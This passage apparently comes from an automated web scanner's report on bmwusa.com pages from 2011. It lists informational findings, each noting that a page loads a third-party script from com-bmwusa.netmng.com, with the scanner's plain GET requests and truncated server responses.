Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:42 GMT;path=/
Content-Length: 256070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.227. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/alpinab7/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:13 GMT;path=/
Content-Length: 256071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.228. http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:33 GMT;path=/
Content-Length: 204497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.229. http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:20 GMT;path=/
Content-Length: 194389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.230. http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/x3savexplore.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/x3savexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:31 GMT;path=/
Content-Length: 179601


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.231. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:09 GMT;path=/
Content-Length: 211880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.232. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:47 GMT;path=/
Content-Length: 211881


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.233. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:39:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:59:39 GMT;path=/
Content-Length: 224196


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.234. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:41 GMT;path=/
Content-Length: 224197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.235. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:25 GMT;path=/
Content-Length: 239128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.236. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:15 GMT;path=/
Content-Length: 239129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.237. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:49 GMT;path=/
Content-Length: 201680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.238. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:34 GMT;path=/
Content-Length: 201681


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.239. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:45:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:05:37 GMT;path=/
Content-Length: 212054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.240. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
